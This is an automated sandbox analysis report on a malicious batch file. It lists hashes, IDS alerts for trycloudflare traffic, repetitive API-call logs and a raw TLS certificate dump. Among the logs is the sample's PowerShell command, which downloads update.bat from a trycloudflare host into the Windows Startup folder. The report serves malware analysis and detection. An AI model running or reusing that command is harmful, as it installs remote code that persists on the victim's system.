Summary | ZeroBOX

de.bat

Generic Malware Downloader Antivirus HTTP ScreenShot Create Service KeyLogger Internet API P2P DGA Http API FTP Socket Escalate priviledges DNS Code injection PWS Sniff Audio Steal credential AntiDebug AntiVM PowerShell
Category Machine Started Completed
FILE s1_win7_x6401 May 4, 2025, 12:45 p.m. May 4, 2025, 1:08 p.m.
Size 807.0B
Type DOS batch file, ASCII text, with CRLF line terminators
MD5 034781001aa560c6139e956ab778a98b
SHA256 3c981c94ae3ad98a5361db8bd41a321380c268afc7c3cc8898fa4171038fe132
CRC32 DF1F580D
ssdeep 24:wq+RfM/N5uQZudDm5t0O4wuVMxudZxeaR3u7za95A9g1ZBXG1LT:akXuQD0wu0oxW45A90ZBWv
Yara None matched

IP Address Status Action
104.16.230.132 Active Moloch
164.124.101.2 Active Moloch

Suricata Alerts

Flow SID Signature Category
UDP 192.168.56.101:59002 -> 164.124.101.2:53 2034552 ET POLICY Observed DNS Query to Commonly Abused Cloudflare Domain (trycloudflare .com) Potentially Bad Traffic
TCP 192.168.56.101:49167 -> 104.16.230.132:443 2058175 ET HUNTING TryCloudFlare Domain in TLS SNI Misc activity
TCP 192.168.56.101:49167 -> 104.16.230.132:443 2060250 ET INFO Observed trycloudflare .com Domain in TLS SNI Misc activity
TCP 192.168.56.101:49167 -> 104.16.230.132:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.101:49167
104.16.230.132:443
C=US, O=Google Trust Services, CN=WR1 CN=trycloudflare.com 37:c4:c9:15:20:43:92:11:a9:ae:35:6c:c0:03:cb:d8:e0:9c:37:6b

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Downloading file...
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Success C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.bat
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Press any key to continue . . .
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f1260
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f17e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f17e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f17e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f1360
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f1360
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f1360
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f1360
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f1360
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f1360
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f0e20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f0e20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f0e20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f17e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f17e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f17e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f16e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f17e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f17e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f17e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f17e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f17e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f17e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f17e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f0f60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f0f60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f0f60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f0f60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f0f60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f0f60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f0f60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f0f60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f0f60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f0f60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f0f60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f0f60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f0f60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f0f60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f1be0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002f1be0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features GET method with no useragent header suspicious_request GET https://minutes-amazing-curriculum-maui.trycloudflare.com/update.bat
request GET https://minutes-amazing-curriculum-maui.trycloudflare.com/update.bat
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02520000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02530000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2704
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72891000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2704
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72892000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02531000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02532000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0271a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0272b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02727000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02712000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02725000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0271c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02970000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0272c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02713000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02714000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02715000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02716000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02717000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02718000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02719000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b51000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b52000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b53000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b54000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b55000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b56000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b57000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b58000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b59000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b5a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b5b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b5c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b5d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b5e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b5f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b61000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b62000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b63000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b64000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.bat
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell -Command "(New-Object Net.WebClient).DownloadFile('https://minutes-amazing-curriculum-maui.trycloudflare.com/update.bat', 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.bat')"
Kaspersky HEUR:Trojan.BAT.Alien.gen
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received [
Data received WhçÝ ²%»äµj”Qs‰v ¬H.ŽDOWNGRD }-T"~Ôk†²åÔéژ¯ôú°…L5½Ëà{‡=cÀÿ 
Data received Ë
Data received ÇÄF0‚B0‚* /’íš7oŽ úl q«Ï0  *†H†÷  0;1 0 UUS10U Google Trust Services1 0 UWR10 250422165136Z 250721174959Z010Utrycloudflare.com0‚"0  *†H†÷ ‚0‚ ‚»oçUkªÎª9ҀhäYMoM"Ãѳ;=ÃG¼ãÇJ*ŽˆPiçåÀ(°[ƒïD‹ü2•¢ˆŠÁxÚò™ß§†cОñÒ 7"7µ‰bíZ()m†ûâæö ÁÍØX¶+çójØÜ†ùj^´ž­qÞWe^“GHg;°ÒìcÞýa%p M³ê ÁS ñÿQç¿D™oMm¸Ã‡¹¹U€îä0Éf µÒÕ՝™XkPt‹r€}kV¡¶ØÔ“Á£ËD¸‡X}ëùU&·š"»<€Éóp˜7ôfä±0ÊöJÙ5¬¢/ecŽ@xVR¹QG®s“Á^ÞhPl¦Î룂_0‚[0Uÿ 0U% 0 +0 Uÿ00Uï9þℌ¾òf{JVÄ7{0U#0€fiIÔÞ*œ‘ω$¸0nˆ.0^+R0P0'+0†http://o.pki.goog/s/wr1/L5I0%+0†http://i.pki.goog/wr1.crt01U*0(‚trycloudflare.com‚*.trycloudflare.com0U  0 0g 06U/0-0+ ) '†%http://c.pki.goog/wr1/Cj_AnkL3zwk.crl0‚ +Öyõòðw}Yáx*{ag|^ýøÐ‡\ N•ž¹/ÙŒ.y¸–^ xÂH0F!ãþl͜:s1L±ðâ'K7ûµ Ð}¯£ÁHkHû÷!µQ—ŠpNÃɋd×;w ƒÐ— Íph9þw7é[uÝÜÊ4•×áç•2úǟø=PßÛ:v ,¬»È*–^ xÐF0D ȓIå&|Ã:•LsE6ï¿o fÔÅMã ß¼I $ó22äAZ¶–WŠ1 ·4ᲦO ª.‰j™˜îž0  *†H†÷  ‚‹•“jÏÞ웧D¦°J¨” Tñ Æ~|±ˆª~kŒ j­§Vt½õav’uö퇦׌„®fø&sÙõh›‹Æ·ÄõCqºæ“!èÁÆR½4a0S»“”ê3͌ågfGÂ’:øv˜5Vv‰óÖÈgw+7é‚ó“¾)î¬!Wt-xæ?‰â„˜ó’zU ~l!¬/#õé „1&=‘<¾Ê¡ËÒæ™³±oS•rá¸!Q=ß?Ã5®pì€ ¨ýÌ^ºÝH†lŠÎª¯U*Ø6GœBâ°îý˅̊T‚õ){µj£çó½¬@èG1ufØq¶0‚ 0‚ó ÙâÂÒŠt¶'¢mh§0  *†H†÷  0G1 0 UUS1"0 U Google Trust Services LLC10U GTS Root R10 231213090000Z 290220140000Z0;1 0 UUS10U Google Trust Services1 0 UWR10‚"0  *†H†÷ ‚0‚ ‚Ïn6Š·+îF˜Spwî£K r¾#-ÂGƏ\ù=æŽî3" ÉH¸°bÎôi r}ÞÕ&Ãn›Ï~× ÏÆ;£‚Ú:ÿlV¿Üéa”Eäi¼OÉÀ­aDr Ð+žhjbjŠ"Wyi+â$3~vc,]¼Qi~#±ÿvñî¸Xµk5ï¡æH(9—1Ù•§ž®Ï˜¼žŠᰗMPo“LJøÛ}ñ™ã–íî1êr=Rß%d¥ pªžè¨¹GȧZ%`oBá×?ç ðƒF3 æKwv¡h§]ïØ(w5­­FäbnâªøÌï7~&³£þ0û0Uÿ†0U%0++0Uÿ0ÿ0UfiIÔÞ*œ‘ω$¸0nˆ.0U#0€ä¯+&q+H'…/Rf,ïð‰q>04+(0&0$+0†http://i.pki.goog/r1.crt0+U$0"0   †http://c.pki.goog/r/r1.crl0U  0 0g 0  *†H†÷  ‚Næ³ ‘`'ùQMî¸Á‰Õ"„—æÖßæN:;)~Þ ñ⍋ӪD7’˜¥ý7Œ©IX1d&eµC×ò—ìT9›U:8wá³@'ÏV{Tœ37yðäîÌQ²‘s!Ã?©¶Ó¤×—Òák$ÛäïèT•• ßý.¶n»ƒZ4Pà†{™ŠŠˆJ¤ÓÇi9Ÿ“˜ðÊAË_È]·«o )Õ$§Ÿo‘#»z7÷ê<*ðÀXéòH5§­DÆ£Ø †Œ“=¤÷°%¾ˆ÷ÿß¾§^€³ØøïÅG%˜Š,>·4ɕjµPuÒ êC¯MîdҙñFt~šwF„ï´ËmÆEz6¹èü§•*¦z¾{ñγê£PU˜ü–P¯¯êÁ®ÎÎÌ«´klã½tpÌ¤úu¢üLVÝ{Ò±.Mø.‘ ¥f« ólqюÍx ½ó…Ã;ħB¸31åñ“–%'U”P¾? 7ý‰_ô ¢¥kõÏo,æÃ„ulü¿ºä7¾9Ù玑F#Üq¶ÃrF̚Ñ@œûºS¨\5ä žñ!³—hq·^–ÛÇü@nвk;1DÚ»@/,—TÝ3Ÿ ¥Î%õ*AåHçè@í_§×à?Ÿ³iƒD¾äàòµhy]nxqÃuv²g0®x¶Ú3‡Gf0‚b0‚J w½ lÛ6ùê!ÄðXÓ 0  *†H†÷  0W1 0 UBE10U GlobalSign nv-sa10U Root CA10UGlobalSign Root CA0 200619000042Z 280128000042Z0G1 0 UUS1"0 U Google Trust Services LLC10U GTS Root R10‚"0  *†H†÷ ‚0‚ ‚¶‹ã¡w›;Ü¿”>·•§@<¡ý‚ù}2‚qööŒûèÛ¼j.——£ŒKù+ö±ù΄±ùŗÞï¹ò£é¼‰^§ªR«ø#'ˤ±œcÛי~ð ^ëh¦ôÆZG M3ãN±£ÈlKìü ßd)%#¡´Ò=.`àÏÒ ‡»ÍHðMÂÂzˆŠ»ºÏYÖ¯°°ž1ñ‚ÁÀß.¦mlµØ~&E=°y¤”(­&å¨þ–è<h”Sîƒ:ˆ+– ²àzŒ.u֜ë§Vd–Oh®=—„À¼@À \½ö‡³5l¬P„àLÍ’Ó 